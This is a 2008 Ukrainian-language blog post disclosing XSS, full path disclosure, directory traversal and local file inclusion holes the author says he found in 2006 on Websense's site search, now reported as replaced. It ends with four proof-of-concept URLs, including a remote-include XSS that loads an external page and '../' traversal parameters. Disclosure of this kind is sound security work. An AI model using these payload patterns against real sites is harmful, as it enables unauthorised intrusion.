Уразливості на websense.com
23:56 02.02.2008Ще у листопаді, 12.11.2006, я знайшов Cross-Site Scripting, Full path disclosure, Directory Traversal та Local File Inclusion уразливості на http://websense.com - сайті секюріті компанії Websense (зокрема в пошуці по сайту http://search.websense.com). Спочатку я знайшов XSS та Full path disclosure дірки, і поки черга дійшла до публікації дір на даному сайті (що трохи відклалось), вияснилося, що вони вже виправили XSS . Тому я знайшов ще нові Directory Traversal та Local File Inclusion дірки, і відклав на деякий час їх публікацію (що знову відтермінувало цей процес).
І от в минулому місяці я дістався вже до ціх дірок на сайті Websense, але вияснилось, що вони повністю відмовилися від свого попереднього пошукового движка і створили новий (більш простий, але й без дір). Тому опублікую зараз вже неактуальні уразливості (котрі вірогідно так і не були повністю виправлені адмінами сайта, вони просто змінили локальний пошуковець). Саме цікаве в даних уразливостях - це знайдена мною Cross-Site Scripting уразливість, за ради якої варто опублікувати дану інформацію.
Знайдена мною 12.11.2006 XSS уразливість на даному сайті - це новий тип XSS уразливостей, котрий я назвав Remote HTML Include та Remote XSS Include. Про даний тип уразливостей я згадав під час MOSEB в записі Vulnerabilities at images.google.com. В 2007 році з’явилися й публікації інших дослідників про подібні уразливості, але я виявив її першим ще в листопаді 2006, тому являюся першовідкривачем даного типу XSS уразливостей .
XSS: Remote HTML Include / Remote XSS Include:
http://search.websense.com/highlight/index.html?url=http://websecurity.com.ua/webtools/xss_r.html&fterm=test&la=en&charset=iso-8859-1&search=../query.html%3Fcharset%3Diso-8859-1%26qt%3Dtest
Full path disclosure:
http://search.websense.com/highlight/index.html?url=http%3A//www.websense.com/internet-filtering/index.php&fterm=test%3C&la=en&charset=iso-8859-1&search=../query.html%3Fcharset%3Diso-8859-1%26qt%3Dtest%3C
Directory Traversal:
http://search.websense.com/help/syntax.html?la=/../index
Local File Inclusion:
http://search.websense.com/help/syntax.html?la=/../query